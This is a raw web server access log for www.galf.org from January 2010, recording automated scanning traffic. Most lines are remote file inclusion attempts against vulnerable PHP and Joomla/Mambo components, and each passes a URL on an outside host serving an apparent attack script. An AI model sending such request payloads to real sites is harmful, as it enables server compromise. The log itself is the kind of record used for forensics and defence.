74.223.143.131 - - [11/Jan/2010:06:34:52 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:00 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:01 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:02 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:35:20 -0800] "GET /logs/access_090629.log%20%20//modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:35:25 -0800] "GET /logs/access_090629.log%20%20//modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:37 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:37 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:38 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:38 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:38 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:40 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:44 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:44 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:35:56 -0800] "GET /logs/access_090720.log/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:36:07 -0800] "GET /logs/access_090706.log%20%20//modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.12.40 - - [11/Jan/2010:06:36:10 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:36:15 -0800] "GET /logs/access_090720.log/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.48.154 - - [11/Jan/2010:06:37:16 -0800] "GET /logs/access_091012.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://bdautosales.com/images/builders/build.url?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:37:17 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:37:17 -0800] "GET /logs/access_091221.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:37:17 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:37:37 -0800] "GET /logs/access_091130.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:37:37 -0800] "GET /logs/access_090928.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:37:57 -0800] "GET /logs/access_090629.log%20%20//modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:38:01 -0800] "GET /logs/access_090803.log%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:38:01 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:38:01 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:38:02 -0800] "GET /logs/access_091005.log%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:38:42 -0800] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:38:42 -0800] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:38:42 -0800] "GET /logs/access_091130.log%20%20//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:38:48 -0800] "GET /logs/access_091221.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:38:48 -0800] "GET /logs/access_091130.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:39:33 -0800] "GET /logs/access_090810.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:39:33 -0800] "GET /logs/access_091012.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:39:53 -0800] "GET /logs/access_090928.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:39:53 -0800] "GET /logs/access_091123.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:39:53 -0800] "GET /logs/access_091102.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.141 - - [11/Jan/2010:06:39:53 -0800] "GET /logs/access_090831.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [11/Jan/2010:06:40:12 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [11/Jan/2010:06:40:12 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [11/Jan/2010:06:40:18 -0800] "GET /logs/access_090629.log%20%20//bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:40:37 -0800] "GET ///skin/uks_gallery_v3010//write.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:40:37 -0800] "GET /logs/access_090831.log////skin/uks_gallery_v3010//write.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:40:37 -0800] "GET /logs////skin/uks_gallery_v3010//write.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:40:59 -0800] "GET /logs/access_091109.log////skin/uks_gallery_v3010//write.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:41:01 -0800] "GET /logs//viewbody.html?code=http://www.tuntunlove.com/main/extend/f?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:41:01 -0800] "GET /viewbody.html?code=http://www.tuntunlove.com/main/extend/f?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:41:01 -0800] "GET /logs/access_091005.log//viewbody.html?code=http://www.tuntunlove.com/main/extend/f?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:41:43 -0800] "GET /logs/access_091005.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:41:43 -0800] "GET /logs/access_090803.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:42:29 -0800] "GET /logs/access_091228.log//viewbody.html?code=http://www.tuntunlove.com/main/extend/f?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:45:09 -0800] "GET /logs/access_091214.log///components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:45:09 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:45:09 -0800] "GET /logs///components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:45:16 -0800] "GET /logs/access_091228.log///components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [11/Jan/2010:06:47:28 -0800] "GET /logs/access_091221.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [11/Jan/2010:06:47:28 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [11/Jan/2010:06:47:28 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [11/Jan/2010:06:49:08 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://al-haqq.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [11/Jan/2010:06:49:08 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://al-haqq.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [11/Jan/2010:06:49:08 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://al-haqq.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [11/Jan/2010:06:49:08 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://al-haqq.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [11/Jan/2010:06:49:11 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://al-haqq.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [11/Jan/2010:06:49:11 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://al-haqq.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:49:38 -0800] "GET /logs/access_090921.log//bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [11/Jan/2010:06:49:56 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [11/Jan/2010:06:49:56 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [11/Jan/2010:06:49:56 -0800] "GET /logs/access_091221.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [11/Jan/2010:06:51:42 -0800] "GET /logs/access_090810.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [11/Jan/2010:06:52:36 -0800] "GET /logs/access_090810.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:53:28 -0800] "GET /logs//ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:53:28 -0800] "GET /logs/access_090831.log%20%20//ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:53:28 -0800] "GET /ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.25 - - [11/Jan/2010:06:53:29 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:53:49 -0800] "GET /logs/access_090831.log%20%20//ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:53:49 -0800] "GET /ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:53:49 -0800] "GET /logs//ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:53:53 -0800] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:53:53 -0800] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.25 - - [11/Jan/2010:06:54:08 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:54:11 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:54:11 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:54:11 -0800] "GET /logs/access_090824.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:54:24 -0800] "GET /logs/access_090629.log//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:54:24 -0800] "GET /logs/access_090720.log//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:54:24 -0800] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:54:24 -0800] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:54:24 -0800] "GET /logs/access_091130.log%20%20//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:55:02 -0800] "GET /logs/access_091228.log%20%20//ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [11/Jan/2010:06:55:38 -0800] "GET /logs/access_090615.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [11/Jan/2010:06:55:38 -0800] "GET /logs/access_090817.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:56:12 -0800] "GET /logs/access_091221.log//bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [11/Jan/2010:06:56:21 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:57:01 -0800] "GET /ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:57:01 -0800] "GET /logs//ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:57:01 -0800] "GET /logs/access_090831.log//ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [11/Jan/2010:06:57:19 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:57:40 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:57:40 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:57:40 -0800] "GET /logs/access_090824.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:57:45 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:57:45 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:57:45 -0800] "GET /logs/access_090824.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:57:58 -0800] "GET /logs/access_091228.log%20%20//ashnews.php?pathtoashnews=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.233.217 - - [11/Jan/2010:06:58:14 -0800] "GET /logs/access_091221.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.233.217 - - [11/Jan/2010:06:58:14 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.233.217 - - [11/Jan/2010:06:58:14 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.233.217 - - [11/Jan/2010:06:58:21 -0800] "GET /logs/access_091130.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.233.217 - - [11/Jan/2010:06:58:21 -0800] "GET /logs/access_090928.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:58:29 -0800] "GET /logs/access_091102.log//bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.233.217 - - [11/Jan/2010:06:59:21 -0800] "GET /logs/access_090810.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.233.217 - - [11/Jan/2010:06:59:21 -0800] "GET /logs/access_091012.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.233.217 - - [11/Jan/2010:06:59:27 -0800] "GET /logs/access_090928.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
